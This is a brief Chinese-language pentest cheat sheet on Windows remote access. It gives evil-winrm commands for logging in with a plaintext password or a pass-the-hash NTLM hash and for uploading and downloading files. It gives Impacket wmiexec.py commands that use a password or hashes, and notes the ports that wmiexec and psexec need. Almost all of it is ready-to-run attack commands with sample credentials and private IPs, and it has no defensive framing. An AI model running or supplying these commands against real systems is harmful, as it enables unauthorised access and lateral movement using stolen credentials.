常用脚本

Evil-winrm

winrm 服务端口 5895 和 5896 是否打开
一般开了就能用

纯文本密码登录

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

使用 NTLM Hash

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

上传下载文件

upload xxx
download xxx

wmiexec

目标主机开放135和445端口

python wmiexec.py administrator:123.com@192.168.52.140
python wmiexec.py administrator@192.168.52.140 -hashes Lm哈希:NTLM哈希

psexec

基于IPC共享，所以要目标打开445端口